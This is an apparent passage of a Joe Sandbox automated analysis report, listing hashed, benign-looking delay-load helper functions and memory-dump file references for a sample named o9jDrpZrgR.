Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 33550b7c920709861202d0efbc37c10eb9e07c50ba9159831260b38142afe415
Instruction ID: 48290da5255fcacd3a7ddc82d17f2e3f39cdad28e67cc25f15bc9f5386439d34
Opcode Fuzzy Hash: 33550b7c920709861202d0efbc37c10eb9e07c50ba9159831260b38142afe415
Instruction Fuzzy Hash: F5B012D1268045BD3504F68A1C07D37150CF0C2B11334C03EFC65C57C0DC40AC880432

Uniqueness

Uniqueness Score: -1.00%

Function 0089E282 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0089E1E3

Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2b0b12d9aca1e187b396c5a5c3897aaa240b745ccffbf3115f693271eb3e4569
Instruction ID: 93821dcad7ac03841dcf67af66a187c3460cb28d9071c44534093680672f57ff
Opcode Fuzzy Hash: 2b0b12d9aca1e187b396c5a5c3897aaa240b745ccffbf3115f693271eb3e4569
Instruction Fuzzy Hash: D1B012E1268045EC3504F18A1D07D37158CF0C1B11334403EF865D5680EC406D851432

Uniqueness

Uniqueness Score: -1.00%

Function 0089E20A Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0089E1E3

Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 46e001195a045bcff50eac6f7e0dc707e88a64e97ba9a9620ef8eadc37268f0e
Instruction ID: dd06eee29ced71d4d32e186a4be1933ad43f5672e016b639afb9cc5b0332c3a5
Opcode Fuzzy Hash: 46e001195a045bcff50eac6f7e0dc707e88a64e97ba9a9620ef8eadc37268f0e
Instruction Fuzzy Hash: FBB012D1268045BD3504F28A1D07D37150CF0C1B11334803EF865C5780DC506D8D0432

Uniqueness

Uniqueness Score: -1.00%

Function 0089E200 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0089E1E3

Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a760bfe127940c275684a93e0c72378763e06b45c00342c2e8894db750f5c4a2
Instruction ID: 8e9eae2f19de494d742a6ca4a681d0a23bb54cb26cd40650441bdf1882c1e8fe
Opcode Fuzzy Hash: a760bfe127940c275684a93e0c72378763e06b45c00342c2e8894db750f5c4a2
Instruction Fuzzy Hash: DBB012D1368185BD3544F28A2C07D37150CF0C1B11334813EF865C5780DC406CC80432

Uniqueness

Uniqueness Score: -1.00%

Function 0089E21E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0089E1E3

Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a7326445832974d0d6e27c64532788e4076c49e6961e543a2125a8e6f9d8ad44
Instruction ID: 4676eea263ec24c967dd870b279fbd3a42508043890ccc12a81db67442f2da08
Opcode Fuzzy Hash: a7326445832974d0d6e27c64532788e4076c49e6961e543a2125a8e6f9d8ad44
Instruction Fuzzy Hash: 59B012F1268045FC3504F18A1C07D37150CF0C2F11334803EFC65C5680DC40AD840432

Uniqueness

Uniqueness Score: -1.00%

Function 0089E228 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0089E1E3

Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e96c8dbfbbfd98c247e6f49c3fb296a3b9ce1924d360fa21dd08c51db8bbffab
Instruction ID: bb257027bdb68ab8bf0043f1bbc9eb6e2a557c01a1137a69d6fb8513008618b2
Opcode Fuzzy Hash: e96c8dbfbbfd98c247e6f49c3fb296a3b9ce1924d360fa21dd08c51db8bbffab
Instruction Fuzzy Hash: 28B012F1268145FC3544F18A1C07D37150CF0C1F11334413EF865C5680DC406DC40432

Uniqueness

Uniqueness Score: -1.00%

Function 0089E23C Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0089E1E3

Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6d3ee30e093fa7291971b6f69ac6a332126173b60c93225c768c68e1dcb74bbe
Instruction ID: 928c996fe6090160356c66174f9818f770d06c81e972061cb193f55dff1827e7
Opcode Fuzzy Hash: 6d3ee30e093fa7291971b6f69ac6a332126173b60c93225c768c68e1dcb74bbe
Instruction Fuzzy Hash: D8B012F1268045EC3504F18B1C07D37150CF0C1F11334407EF865C5680DC406D840432

Uniqueness

Uniqueness Score: -1.00%

Function 0089E232 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0089E1E3

Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d01a8fba3a985338ec3c75123d9faf262f0422e7d28a93592ce4f03acb36cfa6
Instruction ID: 0123b35fce8edafc82d54c26c0ad9149e53cc4197a0bc1b37a0e0977cccba11e
Opcode Fuzzy Hash: d01a8fba3a985338ec3c75123d9faf262f0422e7d28a93592ce4f03acb36cfa6
Instruction Fuzzy Hash: 39B012F1268045EC3504F18A1D07D37150DF0C1F11334403EF865C5680DC406E850432

Uniqueness

Uniqueness Score: -1.00%

Function 0089E246 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0089E1E3

Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 66a84e5cb07ca91cefb1c02c77fcca0d07ec4f0d17c8a5df843f74fe52c6012f
Instruction ID: 8e0e6edb61b1d18da05549fa529fdffd6ac9833371473fb1908bf4e36b2b3e5c
Opcode Fuzzy Hash: 66a84e5cb07ca91cefb1c02c77fcca0d07ec4f0d17c8a5df843f74fe52c6012f
Instruction Fuzzy Hash: A2B012D1269085AC3504F18A1C07D37150DF0C2B11334803EFC65C5680DC40EC840432

Uniqueness

Uniqueness Score: -1.00%

Function 0089E250 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0089E1E3

Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e2f1d71c9748654eeec7cad4fd798502cf570e3669c765c441f50ceb9f808ef6
Instruction ID: ef2db6d9cae4ed0e368d43cc641f081c81efc09fc689c158c950a66f41b880fd
Opcode Fuzzy Hash: e2f1d71c9748654eeec7cad4fd798502cf570e3669c765c441f50ceb9f808ef6
Instruction Fuzzy Hash: 27B012E1269185BC3544F28A1C07D3B150DF0C1B11334413EF865C5680DC40ACC80432

Uniqueness

Uniqueness Score: -1.00%

Function 0089E26E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0089E1E3

Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9784b45f89ef71867142b77f1277af7ba830915f8a9151d3531f86d643a65d6c
Instruction ID: 29f7b62bb5a10cf448c102ccf8b774ac8fab5a87f55e62f2f4ef9a2c6154bb74
Opcode Fuzzy Hash: 9784b45f89ef71867142b77f1277af7ba830915f8a9151d3531f86d643a65d6c
Instruction Fuzzy Hash: F0B012D1268045AC3504F19A1C07D37154CF0C2B11334803EFD65D5680EC40AC841432

Uniqueness

Uniqueness Score: -1.00%

Function 0089E264 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0089E1E3

Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 12a3d75f8c35691443cc4e4263e10ef39fa7f768445e11fbf9ec8334cd39781c
Instruction ID: c6e8f1a2c34cc767eeb50379aef07bbb466b1b87099420260092e4b38bc4271c
Opcode Fuzzy Hash: 12a3d75f8c35691443cc4e4263e10ef39fa7f768445e11fbf9ec8334cd39781c
Instruction Fuzzy Hash: EDB012D1279085AC3504F18A1C07D37154DF4C1B11334407EF866C5680DC40AC840432

Uniqueness

Uniqueness Score: -1.00%

Function 0089E419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0089E3FC

Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2d56c4cf3442979aaa908d6cd30302760e79fdfd27041ca5db4a61fd7bd0e5df
Instruction ID: 6e6074b3421c774b4c86574cb28a9b8189cf777e6323b2f3701bbccff99e098f
Opcode Fuzzy Hash: 2d56c4cf3442979aaa908d6cd30302760e79fdfd27041ca5db4a61fd7bd0e5df
Instruction Fuzzy Hash: 68B012E12680447D3504F18A5D06D77070CF1C2B20334C43FF614D2380EC410C0D1433

Uniqueness

Uniqueness Score: -1.00%

Function 0089E423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0089E3FC

Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 73b7ab6998bdb71bf09e23715800641dfc1324c35b0ac9302f1a6512f6ae899a
Instruction ID: 0f2656769974e0f33890a767dc4148e28fd300132f4d6cf5c47ac6b29305867b
Opcode Fuzzy Hash: 73b7ab6998bdb71bf09e23715800641dfc1324c35b0ac9302f1a6512f6ae899a
Instruction Fuzzy Hash: 4CB012F1268044BC3544F18A5C06D37070CF1C2F10334843FF814D2380EC444E041433

Uniqueness

Uniqueness Score: -1.00%

Function 0089E44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0089E3FC

Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d051ad83d9bde1595230e2047dc7c3f9ae8a7ed5ffab3ac059c501ef826d837a
Instruction ID: 5dc0c45b8685b662ce1ddaf58ede382a630ac9581e47a018df93ff81f39b34ae
Opcode Fuzzy Hash: d051ad83d9bde1595230e2047dc7c3f9ae8a7ed5ffab3ac059c501ef826d837a
Instruction Fuzzy Hash: B3B012E1268044BD3544F18A5C06D37070CF1C2B10334C43FF914D23C0EC404C081433

Uniqueness

Uniqueness Score: -1.00%

Function 0089E593 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0089E580

Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e4adf887138412ba9cfc423ad32a4fa53d842c23801d41e9f0d0f69c04ddd731
Instruction ID: ed2b35c25fd87142672672715200175062e4a593cf4ed9a3ef43e7c700087cb7
Opcode Fuzzy Hash: e4adf887138412ba9cfc423ad32a4fa53d842c23801d41e9f0d0f69c04ddd731
Instruction Fuzzy Hash: 30B012C22681487D3504F1DA1C06D37060CF0C2B14335407FF414C22C1FC400C040432

Uniqueness

Uniqueness Score: -1.00%

Function 0089E5A7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0089E580

Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6a1f1ba367c6867a9245bac1b98c52725836dfec2ff0f0297d9f179f7df123e8
